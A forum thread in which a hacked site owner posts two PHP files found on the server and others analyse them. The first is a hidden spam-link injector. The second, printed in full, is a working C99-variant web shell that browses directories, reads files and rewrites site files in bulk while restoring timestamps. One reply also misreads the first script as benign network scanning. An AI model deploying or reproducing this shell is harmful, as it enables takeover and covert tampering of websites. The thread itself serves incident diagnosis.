Jump to content

How Owned Is This?


dtp
 Share

Recommended Posts

My server got hacked and I found of a bunch of weird files on there, my hosting temp suspended the account because I am thinking I used a free joomla template which had a bad php script in there. I could be wrong though, maybe FTP access? Here is the code to the suspicious file..

<?php

$id = isset($_GET['id']) ? intval($_GET['id']) : 0;

if (!file_exists($id)) {
	exit;
}

if (!file_exists($id.'/map.txt')) {
	exit;
}

kodinnt($id.'/map.txt', $id.'/text.txt', mt_rand(1500, 1800));

function kodinnt($f1, $f2, $c = 2000) {
	$hosts = array();
	$map = array();
	$fh = fopen($f1, 'r');
	while (!feof($fh)) {
		$url = fgets($fh);
		if (preg_match('%href="([^"]+)"%', $url, $ret)) {
			$bit = @parse_url($ret[1]);
			if (!$bit || !isset($bit['host'])) continue;
			$hosts[$bit['host']] = 1;
		}
	}
	rewind($fh);
	$host = array_rand($hosts);
	while (!feof($fh)) {
		$url = fgets($fh);
		if (strpos($url, $host)) {
			$map[] = trim($url);
		}
	}
	fclose($fh);
	$ftext = file_exists($f2);
	if ($ftext) {$word = file_get_contents($f2);$rw = str_word_count($word, 1);}
	$c  = min(sizeof($map),$c);
	$rm = array_rand($map, $c);
	if (!is_array($rm)) {
		$rm = array(1);
	}
	$id = genID();
	$view  = '';
	//$view  = '<script language="javascript">document.write("<style>#'.$id.'{height: 830px; overflow: hidden; position:absolute; top:-869px; left:-1016px;}</style>");</script>';
	$view='<marquee style="position:absolute;width:0px">';
	foreach ($rm as $i) {
		$p1 = '';$p2='';
		if ($ftext) {
		$per=array_rand($rw, mt_rand(1,4));if(!is_array($per))$per=array($per);
		$pos=array_rand($rw, mt_rand(1,4));if(!is_array($pos))$pos=array($pos);
		foreach($per as $pu) {$p1 .= trim($rw[$pu]).' ';}
		foreach($pos as $pu) {$p2 .= trim($rw[$pu]).' ';}}
		$link = trim($map[$i]);
		$link = preg_replace_callback('%\{(.*?)\}%i', create_function('$r','$a=explode(\'|\',$r[1]);return $a[array_rand($a)];'), $link);
		$view.= $p1.$link.$p2."\r\n";
	}
	$view.='</marquee>';
	echo($view);
}

function genID() {
	$id   = '';
	$word = array('q','w','e','r','t','y','u','i','o','p','a','s','d','f','g','h','j','k','l','z','x','c','v','b','n','m');
	$num  = array(0,1,2,3,4,5,6,7,8,9);
	$count = mt_rand(4, 7);
	for ($i = 0; $i < $count; $i++) {
		if ($i == 0) {
			$id .= $word[array_rand($word)];
		} else {
			$ps = mt_rand(1,2);
			if ($ps == 1) {
				$id .= $word[array_rand($word)];
			} else {
				$id .= $num[array_rand($num)];
			}
		}
	}
	return $id;
}


?>

wtf

Link to comment
Share on other sites

After going through the code, it looks like its scanning the network for hosts and then writing whatever it finds to some text files.

kodinnt($id.'/map.txt', $id.'/text.txt', mt_rand(1500, 1800));

The below piece of code, is simply displaying the contents of the files on your browser.

$id = genID();
        $view  = '';
        //$view  = '<script language="javascript">document.write("<style>#'.$id.'{height: 830px; overflow: hidden; position:absolute; top:-869px; left:-1016px;}</style>");</script>';
        $view='<marquee style="position:absolute;width:0px">';
        foreach ($rm as $i) {
                $p1 = '';$p2='';
                if ($ftext) {
                $per=array_rand($rw, mt_rand(1,4));if(!is_array($per))$per=array($per);
                $pos=array_rand($rw, mt_rand(1,4));if(!is_array($pos))$pos=array($pos);
                foreach($per as $pu) {$p1 .= trim($rw[$pu]).' ';}
                foreach($pos as $pu) {$p2 .= trim($rw[$pu]).' ';}}
                $link = trim($map[$i]);
                $link = preg_replace_callback('%\{(.*?)\}%i', create_function('$r','$a=explode(\'|\',$r[1]);return $a[array_rand($a)];'), $link);
                $view.= $p1.$link.$p2."\r\n";
        }
        $view.='</marquee>';
        echo($view);

I don't see any danger with the code. But I think the person who hacked into your server, was really trying to scare you and alert you of the vulnerability that exists within your web application. You will need to investigate or get your hosting company to determine if there is a configuration issue or a vulnerability in general with your web server.

Edited by Infiltrator
Link to comment
Share on other sites

That code itself looks benign, but would need to see what is in map.txt and text.txt. Looks more like an html MARQUEE scroller taking info from a form, and it might be showing links to bad sites, but can't tell what its doing without the other scripts. Looks like its part of a form, that posts against this particular file is in another script and reads in data to throw up in the marquee.

If you did get hacked, I would move to another host though, and void using Joomla at all costs. Seriously, Joomla is like the swiss cheese of CMS software. More holes that you can count. If you still have the theme files you believe to be hacked, hold on to them and go through all of the files, see if there is any reference to external sites, urls, etc, that might be the attackers sites, then you can track it down. In most cases, the files, while possible vulnerable, should be able to be thwarted if the host's servers are secured, since most hacks are either SQL injection, or RFI attacks, much of this can be avoided, but if the scripts allowed any system execution, its game over. Joomla in itself, regardless of theme used, tends to be very hackable and just about every version that has come out, has been vulnerable to attack.

http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=joomla&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=

Link to comment
Share on other sites

basically thats what the whole file looks lke but its bigger, I also found a map.php

<?php


/*
* @author: 
* @icq:    
* @site:   http://forum.antichat.ru/
*
*/
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);

$win = strtolower(substr(PHP_OS,0,3)) == "win";
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
$_REQUEST = array_merge($_COOKIE,$_POST);
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
$shver = "4.0";
if (empty($surl)){
	$surl = $_SERVER['PHP_SELF'];
}
$surl = htmlspecialchars($surl);

$curdir = "./";
$tmpdir = "";
$tmpdir_log = "./";

$sort_default = "0a";
$sort_save = TRUE;


$safemode_diskettes = array('a');
$hexdump_lines = 8;
$hexdump_rows = 24;
$nixpwdperpage = 100;



extract($_POST);


if (isset($_POST['act'])) $act  = $_POST['act'];
if (isset($_POST['f'])) $f    = urldecode($_POST['f']);
if (isset($_POST['d'])) $d    = urldecode($_POST['d']); else $d=getcwd();


$lastdir = realpath(".");
chdir($curdir);


function recursFile($dir) {
	$files = array();
	if (substr($dir, -1) != DIRECTORY_SEPARATOR) {
		$dir .= DIRECTORY_SEPARATOR;
	}
	$handle = @opendir($dir);
	if ($handle === false) {
		return false;
	}
	while (($file = readdir($handle)) !== FALSE) {
		if ($file != '.' && $file != '..') {
			if (is_dir($dir.$file.DIRECTORY_SEPARATOR)) {
				$temp = recursFile($dir.$file);
				if ($temp !== false) {
					$files = array_merge($files, $temp);
				}
			} else {
				$files[] = $dir.$file;
			}
		}
	}
	closedir($handle);
	return $files;
}

function tabsort($a,$B) 
{
	global $v; 
	return strnatcmp($a[$v], $b[$v]);
}
function save_file($file, $content) {
	global $win;
	if(!file_exists($file)) {
		return false;
	}
	clearstatcache();
	$filetime = filemtime($file);
	if(!is_writable($file)) {
		$fileperm = substr(decoct(fileperms($file)), -4, 4);
		@chmod($file, intval(0777,8));
		if(!is_writable($file)) {
			return false;
		}
	}
	$handle = @fopen($file, 'w');
	if($handle === FALSE) {
		return false;
	}
	fwrite($handle, $content);
	fclose($handle);
	@touch($file, $filetime, $filetime);
	if(isset($fileperm) && !empty($fileperm)) {
		@chmod($file, intval($fileperm,8));
	}
	clearstatcache();
	return true;
}

if (!function_exists("stripos")) {
  function stripos($str,$needle) {
   return strpos(strtolower($str),strtolower($needle));
  }
}
function view_perms($mode)
{
 if (($mode & 0xC000) === 0xC000) {$type = "s";}
 elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
 elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
 elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
 elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
 elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
 elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
 else {$type = "?";}

 $owner["read"] = ($mode & 00400)?"r":"-";
 $owner["write"] = ($mode & 00200)?"w":"-";
 $owner["execute"] = ($mode & 00100)?"x":"-";
 $group["read"] = ($mode & 00040)?"r":"-";
 $group["write"] = ($mode & 00020)?"w":"-";
 $group["execute"] = ($mode & 00010)?"x":"-";
 $world["read"] = ($mode & 00004)?"r":"-";
 $world["write"] = ($mode & 00002)? "w":"-";
 $world["execute"] = ($mode & 00001)?"x":"-";

 if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
 if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
 if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}

 return $type.join("",$owner).join("",$group).join("",$world);
}
function parsesort($sort)
{
 $one = intval($sort);
 $second = substr($sort,-1);
 if ($second != "d") {$second = "a";}
 return array($one,$second);
}
if (!function_exists("parse_perms"))
{
function parse_perms($mode)
{
 if (($mode & 0xC000) === 0xC000) {$t = "s";}
 elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
 elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
 elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
 elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
 elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
 elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
 else {$t = "?";}
 $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
 $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
 $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
 return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
}
}
if(!function_exists('str_ireplace')){
  function str_ireplace($search,$replace,$subject){
    $token = chr(1);
    $haystack = strtolower($subject);
    $needle = strtolower($search);
    while (($pos=strpos($haystack,$needle))!==FALSE){
      $subject = substr_replace($subject,$token,$pos,strlen($search));
      $haystack = substr_replace($haystack,$token,$pos,strlen($search));
    }
    $subject = str_replace($token,$replace,$subject);
    return $subject;
  }
}

function str2mini($content,$len)
{
 if (strlen($content) > $len)
 {
  $len = ceil($len/2) - 2;
  return substr($content, 0,$len)."...".substr($content,-$len);
 }
 else {return $content;}
}
function view_perms_color($o)
{
 if (!@is_readable($o)) {return "<font color=red>".view_perms(@fileperms($o))."</font>";}
 elseif (!@is_writable($o)) {return "<font color=white>".view_perms(@fileperms($o))."</font>";}
 else {return "<font color=green>".view_perms(@fileperms($o))."</font>";}
}



function no_antivir_search($d)
{
 global $found;
 global $found_d;
 global $found_f;
 global $search_i_f;
 global $search_i_d;
 global $a;
 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 $h = opendir($d);
 while (($f = readdir($h)) !== FALSE)
 {
  if($f != "." && $f != "..")
  {
   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
   if (is_dir($d.$f))
   {
    $search_i_d++;
    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
    if (!is_link($d.$f)) {no_antivir_search($d.$f);}
   }
   else
   {
    $search_i_f++;
    if ($bool)
    {
     if (!empty($a["text"]))
     {
      $r = @file_get_contents($d.$f);
      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
      else {$bool = strpos(" ".$r,$a["text"],1);}
      if ($a["text_not"]) {$bool = !$bool;}
      if ($bool) {$found[] = $d.$f; $found_f++;}
     }
     else {$found[] = $d.$f; $found_f++;}
    }
   }
  }
 }
 closedir($h);
}
if(!isset($act)) {$act='';}
if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}

header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", FALSE);
header("Pragma: no-cache");
if (empty($tmpdir))
{
 $tmpdir = ini_get("upload_tmp_dir");
 if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
}
$tmpdir = realpath($tmpdir);
$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
else {$tmpdir_logs = realpath($tmpdir_logs);}
$ud = urlencode($d);
?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title>C99shell k1b0rg Edition (REPLACER)</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>

<form name='todo' method='POST'>
<input name='act' type='hidden' value=''>
<input name='d' type='hidden' value=''>
<input name='f' type='hidden' value=''>
</form><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><font face="Verdana" size="5"><b>C99ReplaceR</b> k1b0rg Edition</font><font face=Webdings size=6><b>!</b></font></p></center></th></tr>
<tr><td>
<p align="left"><?php
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$d = str_replace("\\\\","\\",$d);
$dispd = htmlspecialchars($d);
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
$i = 0;
foreach($pd as $B)
{
 $t = "";
 $j = 0;
 foreach ($e as $r)
 {
  $t.= $r.DIRECTORY_SEPARATOR;
  if ($j == $i) {break;}
  $j++;
 }
 echo "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($t)."';document.todo.submit();\"><b>".htmlspecialchars($B).DIRECTORY_SEPARATOR."</b></a>";
 $i++;
}
echo "   ";
if (@is_writable($d))
{
 $wd = TRUE;
 $wdt = "<font color=green>[ ok ]</font>";
 echo "<b><font color=green>".view_perms(@fileperms($d))."</font></b>";
}
else
{
 $wd = FALSE;
 $wdt = "<font color=red>[ Read-Only ]</font>";
 echo "<b>".view_perms_color($d)."</b>";
}
echo "<br>";
$letters = "";
if ($win)
{
 $v = explode("\\",$d);
 $v = $v[0];
 foreach (range("a","z") as $letter)
 {
  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
  if (!$bool) {$bool = is_dir($letter.":\\");}
  if ($bool)
  {
   $letters .= "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($letter.":\\")."';document.todo.submit();\">[ ";
   if (strtolower($letter.':') != strtolower($v)) {$letters .= $letter;}
   else {$letters .= "<font color=\"#00FF66\">".$letter."</font>";}
   $letters .= " ]</a> ";
  }
 }
 if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
}

echo "</p></td></tr></table><br>";
if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
if ($act == "") {$act = "ls";}



if($act == 'replace') {
	if(!empty($found_text)) {
		if($recurs == 2) {
			$files = array();
			$dir = opendir($d);
			while (($file = readdir($dir)) !== FALSE) {
				if(is_file($d.$file)) {
					$files[] = $d.$file;
				}
			}
			closedir($dir);
		} else {
			$files = recursFile($d);
		}
		if(strpos($ext, '*') === false) {
			$ext = array_map('trim', explode(',', $ext));
			foreach($files as $key=>$file) {
				if(strpos($file, '.') !== false) {
					$temp = explode('.', $file);
					if(!in_array($temp[count($temp)-1], $ext)) {
						unset($files[$key]);
					}
				} else {
					unset($files[$key]);
				}
			}
		}
		$result = array();
		$count = 0;
		foreach($files as $file) {
			$result[$count]['file'] = $file;
			$content = @file_get_contents($file);
			if(!$content) {
				$result[$count]['status'] = '<font color=red>ERROR: File not read</font>';
				++$count;
				continue;
			}
			if(stripos($content, $found_text) !== false || isset($regular)) {
				if(isset($regular)) {
					$content = preg_replace('%'.$found_text.'%i', $replace_text, $content);
				} else {
					if(isset($register)) {
						$content = str_ireplace($found_text, $replace_text, $content);
					} else {
						$content = str_replace($found_text, $replace_text, $content);
					}
				}
			} else {
				if (!isset($view_none)) {
					$result[$count]['status'] = '<font color=red>ERROR: Match not found in file</font>';
					++$count;
				}
				continue;
			}
			if(save_file($file, $content)) {
				$result[$count]['status'] = '<font color=green>REPLACE: OK</font>';
			} else {
				$result[$count]['status'] = '<font color=red>ERROR: Content not saved in file</font>';
			}
			++$count;
		}
		for($i = 0; $i < sizeof($result); ++$i) {
			echo('<p><a href="#" onclick="document.todo.act.value=\'view\';document.todo.f.value=\''.urlencode($result[$i]['file']).'\';document.todo.submit();">'.$result[$i]['file'].'</a> => '.$result[$i]['status'].'</p>');
		}
	} else {
		$act = 'ls';
	}
}

if ($act == "view") {
	echo(file_get_contents($f));
}
if ($act == "ls")
{
  $list = array();
  if ($h = @opendir($d))
  {
   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
   closedir($h);
  }
	if (count($list) == 0) {
		echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";
	} elseif (sizeof($list) > 500) {
		echo '<center><b>Too many files ('.sizeof($list).')!</b></center>';
	} else {
  //Building array
  $objects = array();
  $vd = "f"; //Viewing mode
  if ($vd == "f")
  {
   $objects["head"] = array();
   $objects["folders"] = array();
   $objects["links"] = array();
   $objects["files"] = array();
   foreach ($list as $v)
   {
    $o = @basename($v);
    $row = array();
    if ($o == ".") {$row[] = $d.$o; }
    elseif ($o == "..") {$row[] = $d.$o; }
    elseif (is_dir($v))
    {
     if (@is_link($v)) {}
     else {}
     $row[] = $v;
    }
    elseif(@is_file($v)) {$row[] = $v; }

    $row[] = @fileperms($v);
    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
    elseif (@is_link($v)) {$objects["links"][] = $row;}
    elseif (@is_dir($v)) {$objects["folders"][] = $row;}
    elseif (@is_file($v)) {$objects["files"][] = $row;}
    $i++;
   }
   $row = array();
   $row[] = "<b>Name</b>";
   $row[] = "<b>Perms</b>";
   $row['event'] = '';
   $sort = 'a';
   $parsesort = parsesort($sort);

   $v = $parsesort[0];
   usort($objects["folders"], "tabsort");
   usort($objects["links"], "tabsort");
   usort($objects["files"], "tabsort");
   if ($parsesort[1] == "d")
   {
    $objects["folders"] = array_reverse($objects["folders"]);
    $objects["files"] = array_reverse($objects["files"]);
   }
   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
   $tab = array();
   $tab["cols"] = array($row);
   $tab["head"] = array();
   $tab["folders"] = array();
   $tab["links"] = array();
   $tab["files"] = array();
   $i = 0;
   foreach ($objects as $a)
   {
    $v = $a[0];
    $o = basename($v);
    $dir = dirname($v);
    if (isset($disp_fullpath)) {$disppath = $v;}
    else {$disppath = $o;}
    $disppath = str2mini($disppath,60);

    $uo = urlencode($o);
    $ud = urlencode($dir);
    $uv = urlencode($v);
    $row = array();
    if ($o == "." || $o == "..") {
	 $row['event'] = 'onclick="document.todo.act.value=\'ls\';document.todo.d.value=\''.urlencode(realpath($d.$o)).'\';document.todo.submit();"';
     $row[] = $o;
    } else {
		if (is_link($v)){
			$disppath .= " => ".readlink($v);
		} elseif (is_dir($v)) {
			$row['event'] = 'onclick="document.todo.act.value=\'ls\';document.todo.d.value=\''.$uv.'\';document.todo.submit();"';
			$row[] =  " [".$disppath."]";
		} else {
			$row['event'] = '';
			$row[] =  " ".$disppath;
		}
	}

     $row[] =  "<b>".view_perms_color($v)."</b>";
    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
    elseif (@is_link($v)) {$tab["links"][] = $row;}
    elseif (@is_dir($v)) {$tab["folders"][] = $row;}
	elseif (@is_file($v)) {$tab["files"][] = $row;}
    $i++;
   }
  }
  //Compiling table
  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
  echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0>";
  foreach($table as $row)
  {
   echo "<tr onMouseOver=\"this.style.background='black'\" onMouseOut=\"this.style.background='#333333'\" ".$row['event'].">\r\n";
   unset($row['event']);
   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
   echo "</tr>\r\n";
  }
  echo "</table><hr size=\"1\" noshade><p align=\"right\">";
 }
}



?>
</td></tr></table><a bookmark="minipanel"><br>
<form method="POST">
<input type=hidden name=act value="replace">
<input type=hidden name="d" value="<?php echo $dispd; ?>">
<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: RePlAcE::</b></p></td></tr>
<tr><td width="50%" height="1" valign="top">

<br />
<center>
<table>
	<tr>
		<td>:: File Extension (* - any file) ::</td>
		<td><input type="text" name="ext" size="50" value="php,phtml,html"></td>
	</tr>
	<tr>
		<td>:: Èñïîëüçîâàòü ðåêóðñèþ ::</td>
		<td><label><input type="radio" name="recurs" value="1" checked> Äà </label><label><input type="radio" name="recurs" value="2"> Íåò</label></td>
	</tr>
	<tr>
		<td>:: Ðåãèñòðîíåçàâèñèìûé ïîèñê ::</td>
		<td><input type="checkbox" name="register" size="50" value="1"></td>
	</tr>
	<tr>
		<td>:: Èñïîëüçîâàòü ðåãóëÿðêè äëÿ ïîèñêà ::</td>
		<td><input type="checkbox" name="regular" size="50" value="1"></td>
	</tr>
	<tr>
		<td>:: Âûâîäèòü ôàéëû áåç ñîâïàäåíèé ::</td>
		<td><input type="checkbox" name="view_none" size="50" value="1"></td>
	</tr>
</table>
</center>


</td>


<td width="50%" height="1" valign="top">
<center>
<b>:: Òåêñò äëÿ ïîèñêà ::</b> <br ><textarea name="found_text"    cols=136 rows=5></textarea> <br />
<b>:: Òåêñò äëÿ çàìåíû ::</b> <br /><textarea name="replace_text" cols=136 rows=5></textarea>

</center></td></tr>
<tr><td width="100%" height="1" valign="top" colspan="2"><center><input type="submit" value="Ìíå ïîâåç¸ò!!!" style="width:100%"></center></td></tr></TABLE>
</form>

</body></html><?php chdir($lastdir); ?>

hummm..

Link to comment
Share on other sites

So they basically spammed a bunch of links from your site. You should edit, and remove those posts. Don't need search engines indexing the forums, with spam links to their sites. Thats exactly what they want to do with sites like yours that they hacked, and you just basically did the same thing here without having to hack it.

Link to comment
Share on other sites

So they basically spammed a bunch of links from your site. You should edit, and remove those posts. Don't need search engines indexing the forums, with spam links to their sites. Thats exactly what they want to do with sites like yours that they hacked, and you just basically did the same thing here without having to hack it.

I apologize, I deleted the links between the code. I did not realize that search engines would pick up on stuff between the BBcode [ code ] feature. I deleted all of the stuff I could find on the site which looked spam related, going to go back and do a double check to make sure I got everything.

I've got another website which the forums are getting spammed so hard I may have to go into the database to delete all the posts, I've tried banning IP's and all of that but it seems impossible lol, Is there some kind of way to just ban all IP's from Russia and China?

Link to comment
Share on other sites

You can ban russian and chinese subnets, sure, but more than likely, the addresses will change and they will continue with proxies and compromised machines in other locations. Its a cat and mouse game, and the spammers know it. Setting rules for posting and blocking the ability to post links until after a certain number if posts, is one thing to add, forcing session cookies with same domain referring is another, changing your user registration process to make the end user have to answer basic math or english questions to rid automated bots is also something you can try. At the end of the day, its an uphill battle, and if a spammer is determined enough, they will post crap, even if having to do it manually.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...